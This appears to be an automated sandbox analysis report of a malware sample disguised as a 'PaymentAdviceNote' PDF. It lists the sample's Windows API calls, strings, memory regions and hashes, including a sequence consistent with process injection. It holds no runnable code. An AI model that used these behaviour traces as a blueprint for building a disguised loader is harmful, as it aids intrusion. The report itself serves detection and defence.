                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateShow
                                                              • String ID: AutoIt v3$edit
                                                              • API String ID: 1584632944-3779509399
                                                              • Opcode ID: df04147a9c2cf0ee41da64eeb9316fff090db98d5988c30870b37d328f7254e7
                                                              • Instruction ID: e16166f902b1898b422be47289ff57100f0794ce92bca885c39aafd9fe890ad2
                                                              • Opcode Fuzzy Hash: df04147a9c2cf0ee41da64eeb9316fff090db98d5988c30870b37d328f7254e7
                                                              • Instruction Fuzzy Hash: DAF03A70514294BFEA30672B6C0CF2B3E7EEBC6F50F02402EBA14A2171C2710850EEB0

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 01655200: Sleep.KERNELBASE(000001F4), ref: 01655211
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01655454
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CreateFileSleep
                                                              • String ID: AGRRZD35N3OTKJFGEU0XAS73LVK
                                                              • API String ID: 2694422964-2491944136
                                                              • Opcode ID: 4c6b8a5609d8e190fe69abf6f216281f308f2dce88423cbf2571ba08131781f9
                                                              • Instruction ID: c4d585c62a2d22a4cb78d87c515377ddfa3f81644be775e6cfbbe738049e45cf
                                                              • Opcode Fuzzy Hash: 4c6b8a5609d8e190fe69abf6f216281f308f2dce88423cbf2571ba08131781f9
                                                              • Instruction Fuzzy Hash: 9D619070D04288DAEF11DBB8C858BDEBBB59F15304F044198E649BB2C1D7B91B49CBA6

                                                               Control-flow Graph (rendered graph omitted; function at 84407c, basic blocks 84407c-87d41e, calling 847a16, 847bcc, 847b2e, 846fe3, 862de0, 84454e, 862dbc, 845904, 847cab and 848047, with direct calls to LoadStringW and Shell_NotifyIconW)
                                                              APIs
                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0087D3D7
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                              • _memset.LIBCMT ref: 008440FC
                                                              • _wcscpy.LIBCMT ref: 00844150
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00844160
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                              • String ID: Line:
                                                              • API String ID: 3942752672-1585850449
                                                              • Opcode ID: c26eb76cc201f01ac5a8aa2b72661d5def7b7bf070853f13e98441d934b6cd3d
                                                              • Instruction ID: 8d2cb23a77722e98aacd59cd799d0da6f574d03cbcef0276154d82660e1d9c9f
                                                              • Opcode Fuzzy Hash: c26eb76cc201f01ac5a8aa2b72661d5def7b7bf070853f13e98441d934b6cd3d
                                                              • Instruction Fuzzy Hash: D931AE71008708AFD721EB68DC46FEB77E8FF44314F20451AB699D20A1EB749658CB93

                                                               Control-flow Graph (rendered graph omitted; function at 84686a, basic blocks 84686a-87e2b8, internal calls only, including 844ddd, 8a955b, 844e4a, 860db6, 846a8c, 8a42f8, 847480, 845db2, 8a73e9, 84750f, 84735d, 89f73d, 847de1, 845904, 89f7a1, 860e2c and 862d55)
                                                              APIs
                                                                • Part of subcall function 00844DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00844E0F
                                                              • _free.LIBCMT ref: 0087E263
                                                              • _free.LIBCMT ref: 0087E2AA
                                                                • Part of subcall function 00846A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00846BAD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                              • API String ID: 2861923089-1757145024
                                                              • Opcode ID: 10b8bc42f9c729f8b8f237bc65e856c19295fbd304f4bd754d632c91b6c8ddf8
                                                              • Instruction ID: d18190800ef837ba4bae1d26882f13ded5e7ca13113f60013cd56a3953a471da
                                                              • Opcode Fuzzy Hash: 10b8bc42f9c729f8b8f237bc65e856c19295fbd304f4bd754d632c91b6c8ddf8
                                                              • Instruction Fuzzy Hash: FD915B7191021DAFCF04EFA8C8819EDB7B8FF19314B14846AF819EB2A2DB709915CB51
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008435A1,SwapMouseButtons,00000004,?), ref: 008435D4
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008435A1,SwapMouseButtons,00000004,?,?,?,?,00842754), ref: 008435F5
                                                              • RegCloseKey.KERNELBASE(00000000,?,?,008435A1,SwapMouseButtons,00000004,?,?,?,?,00842754), ref: 00843617
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Control Panel\Mouse
                                                              • API String ID: 3677997916-824357125
                                                              • Opcode ID: 8b9a53f8c271772c9c3490c56d3a2e61b3149951ccf8b53abaff37c40d9cbc44
                                                              • Instruction ID: d13593dd9c52d3e4bd4f7127de4d6004eca4809fce1e42270cfba1c1a98c6b34
                                                              • Opcode Fuzzy Hash: 8b9a53f8c271772c9c3490c56d3a2e61b3149951ccf8b53abaff37c40d9cbc44
                                                              • Instruction Fuzzy Hash: 2911487151020DBFEB219FA4DC40DAEB7B9FF14740F128469F905E7210D2719E40A760
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 016549BB
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01654A51
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01654A73
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281658445.0000000001652000.00000040.00000020.00020000.00000000.sdmp, Offset: 01652000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1652000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                              • Instruction ID: d5c0ad5488ca99b4f9b5327446ebdd40ad1c8b5e789632e481e2dc612788a926
                                                              • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                              • Instruction Fuzzy Hash: 4D620B30A142589BEB64CFA4CC50BDEB772EF58300F1091A9D50DEB394EB799E81CB59
                                                              APIs
                                                                • Part of subcall function 00844EE5: _fseek.LIBCMT ref: 00844EFD
                                                                • Part of subcall function 008A9734: _wcscmp.LIBCMT ref: 008A9824
                                                                • Part of subcall function 008A9734: _wcscmp.LIBCMT ref: 008A9837
                                                              • _free.LIBCMT ref: 008A96A2
                                                              • _free.LIBCMT ref: 008A96A9
                                                              • _free.LIBCMT ref: 008A9714
                                                                • Part of subcall function 00862D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00869A24), ref: 00862D69
                                                                • Part of subcall function 00862D55: GetLastError.KERNEL32(00000000,?,00869A24), ref: 00862D7B
                                                              • _free.LIBCMT ref: 008A971C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                              • String ID:
                                                              • API String ID: 1552873950-0
                                                              • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                              • Instruction ID: 2ab2f689797c572244a4e4562a145ad226acf9b2207a67c0ed09499a1d80dba2
                                                              • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                              • Instruction Fuzzy Hash: 95514CB1D14218ABDF259F68CC81A9EBBB9FF49300F1044AEF249E3241DB715A80CF59
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                              • String ID:
                                                              • API String ID: 2782032738-0
                                                              • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                              • Instruction ID: 9fce285a45aa91ff87f4d732651d8ef4007060f19dc4ca2a65d77a6c6ca183cd
                                                              • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                              • Instruction Fuzzy Hash: 5541D475B0074EDBDB19DEA9C8809AE7BA6FF42364B26D53DE815C7640DB70DD408B40
                                                              APIs
                                                              • _memset.LIBCMT ref: 008444CF
                                                                • Part of subcall function 0084407C: _memset.LIBCMT ref: 008440FC
                                                                • Part of subcall function 0084407C: _wcscpy.LIBCMT ref: 00844150
                                                                • Part of subcall function 0084407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00844160
                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00844524
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00844533
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0087D4B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                              • String ID:
                                                              • API String ID: 1378193009-0
                                                              • Opcode ID: b3ace59dce47c8f0cedf54e9ce5aab57992adf2c9cb1634b32513cd5d8c8c561
                                                              • Instruction ID: b05d9f0c12cf55fe9ea89600ecdbf9abe6bf28e1bc602c2a333091f56db4fb8e
                                                              • Opcode Fuzzy Hash: b3ace59dce47c8f0cedf54e9ce5aab57992adf2c9cb1634b32513cd5d8c8c561
                                                              • Instruction Fuzzy Hash: BD21D070904788AFEB328B24D845BE6BBFCFF01318F04409EE79E96182C3746A84DB45
                                                              APIs
                                                              • _memset.LIBCMT ref: 0087EA39
                                                              • GetOpenFileNameW.COMDLG32(?), ref: 0087EA83
                                                                • Part of subcall function 00844750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00844743,?,?,008437AE,?), ref: 00844770
                                                                • Part of subcall function 00860791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008607B0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                              • String ID: X
                                                              • API String ID: 3777226403-3081909835
                                                              • Opcode ID: 93a3099a83351d5b3841daf882e5cb79d295dbdc4e724199ba64b62c5c0167ee
                                                              • Instruction ID: 116155b6357de1143852dde759f36ec4b2986e941c585e58e12a18412e5f1337
                                                              • Opcode Fuzzy Hash: 93a3099a83351d5b3841daf882e5cb79d295dbdc4e724199ba64b62c5c0167ee
                                                              • Instruction Fuzzy Hash: C021A131A1025C9BCF419FD8D845BEEBBF8FF49714F008059E508E7241DBB459898FA2
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 008A98F8
                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 008A990F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Temp$FileNamePath
                                                              • String ID: aut
                                                              • API String ID: 3285503233-3010740371
                                                              • Opcode ID: 03ec59d4ad4291f9ea8a7456d4eddec21054e4d18ced728f710dc4a73371b63e
                                                              • Instruction ID: db23eb14d689b19d5c10f46c16977df456b89cf684b8e9d2b75233540e320fff
                                                              • Opcode Fuzzy Hash: 03ec59d4ad4291f9ea8a7456d4eddec21054e4d18ced728f710dc4a73371b63e
                                                              • Instruction Fuzzy Hash: 86D05B7554030DABDB509BA0DC0DF9A773CF704700F0002B1BB54D1191D97055548B91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3a8cff0e410a79fd5ce9c3b72518a71df4f0818bb48ed77871aecb8db348599
                                                              • Instruction ID: a3fb8f4e453a0514d5d944bb3de5d9655b6b16be603480a274cdc7a421cb0883
                                                              • Opcode Fuzzy Hash: a3a8cff0e410a79fd5ce9c3b72518a71df4f0818bb48ed77871aecb8db348599
                                                              • Instruction Fuzzy Hash: 05F103756083059FCB14DF28C480A6ABBE5FB89314F14896EF899DB352DB70E945CF82
                                                              APIs
                                                                • Part of subcall function 00860162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00860193
                                                                • Part of subcall function 00860162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0086019B
                                                                • Part of subcall function 00860162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008601A6
                                                                • Part of subcall function 00860162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008601B1
                                                                • Part of subcall function 00860162: MapVirtualKeyW.USER32(00000011,00000000), ref: 008601B9
                                                                • Part of subcall function 00860162: MapVirtualKeyW.USER32(00000012,00000000), ref: 008601C1
                                                                • Part of subcall function 008560F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0084F930), ref: 00856154
                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0084F9CD
                                                              • OleInitialize.OLE32(00000000), ref: 0084FA4A
                                                              • CloseHandle.KERNEL32(00000000), ref: 008845C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                              • String ID:
                                                              • API String ID: 1986988660-0
                                                              • Opcode ID: ce2c0b4545df8c927187212d6763569e360be7df5fb837ece02b5d23ba5868e4
                                                              • Instruction ID: a2c357a923c6462cda1491e1c39c78780be3fa14978c381956fe41745165607d
                                                              • Opcode Fuzzy Hash: ce2c0b4545df8c927187212d6763569e360be7df5fb837ece02b5d23ba5868e4
                                                              • Instruction Fuzzy Hash: C781C3B0929B44CFC794DF39AC4869B7BEAFB58306752812AD109C7372E7704884EF11
                                                              APIs
                                                              • _memset.LIBCMT ref: 00844370
                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00844415
                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00844432
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_$_memset
                                                              • String ID:
                                                              • API String ID: 1505330794-0
                                                              • Opcode ID: 66003e2942c384f3ecb9d90b2483318e1dab49653c53da93051c3c0a0ca8773f
                                                              • Instruction ID: bf490316bc73e35858d2342500cd2c9c8deed37086e216a873be2779f70565b1
                                                              • Opcode Fuzzy Hash: 66003e2942c384f3ecb9d90b2483318e1dab49653c53da93051c3c0a0ca8773f
                                                              • Instruction Fuzzy Hash: 593173715057058FD721DF28D884B9BBBF8FF58708F00092EE69AD3251E771A944CB96
                                                              APIs
                                                              • __FF_MSGBANNER.LIBCMT ref: 00865733
                                                                • Part of subcall function 0086A16B: __NMSG_WRITE.LIBCMT ref: 0086A192
                                                                • Part of subcall function 0086A16B: __NMSG_WRITE.LIBCMT ref: 0086A19C
                                                              • __NMSG_WRITE.LIBCMT ref: 0086573A
                                                                • Part of subcall function 0086A1C8: GetModuleFileNameW.KERNEL32(00000000,009033BA,00000104,?,00000001,00000000), ref: 0086A25A
                                                                • Part of subcall function 0086A1C8: ___crtMessageBoxW.LIBCMT ref: 0086A308
                                                                • Part of subcall function 0086309F: ___crtCorExitProcess.LIBCMT ref: 008630A5
                                                                • Part of subcall function 0086309F: ExitProcess.KERNEL32 ref: 008630AE
                                                                • Part of subcall function 00868B28: __getptd_noexit.LIBCMT ref: 00868B28
                                                              • RtlAllocateHeap.NTDLL(01610000,00000000,00000001,00000000,?,?,?,00860DD3,?), ref: 0086575F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 1372826849-0
                                                              • Opcode ID: fd87d49813f0b908169f64f58c6c9167ade2b9adf374d6b7e57cea7c408da5a9
                                                              • Instruction ID: e25956628c781caa4718d71069430158315b0632e75ee6e6512ed744a41fd6da
                                                              • Opcode Fuzzy Hash: fd87d49813f0b908169f64f58c6c9167ade2b9adf374d6b7e57cea7c408da5a9
                                                              • Instruction Fuzzy Hash: 3E01B135244B05EEE615373DEC92A2E739CFB82765F530536F519EA2C2DE709C005762
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,008A9548,?,?,?,?,?,00000004), ref: 008A98BB
                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008A9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008A98D1
                                                              • CloseHandle.KERNEL32(00000000,?,008A9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008A98D8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: 637b35b1410be9fec774b108022cb1567e6ce3d38f3f8cb24135938f53f20e61
                                                              • Instruction ID: 4702eccdf5ab5079b56acec78f896d7b8726f449b9862dc86cbfd5e65927b812
                                                              • Opcode Fuzzy Hash: 637b35b1410be9fec774b108022cb1567e6ce3d38f3f8cb24135938f53f20e61
                                                              • Instruction Fuzzy Hash: 46E08632141214B7F7221B64EC09FCA7B2AFB06760F144121FB54A90E187B115119798
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CALL
                                                              • API String ID: 0-4196123274
                                                              • Opcode ID: 56179666261b6362c35437200ce24466fbf502d8af33ef65efbd14362198d8c0
                                                              • Instruction ID: e65a074964c33e106fbaaa207e9b86c4ce366255fabe74ee630f5022616cb32b
                                                              • Opcode Fuzzy Hash: 56179666261b6362c35437200ce24466fbf502d8af33ef65efbd14362198d8c0
                                                              • Instruction Fuzzy Hash: 9B224670548209DFDB28DF18C490A2ABBE1FF84314F15896DE89ADB262D735EC45CB82
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
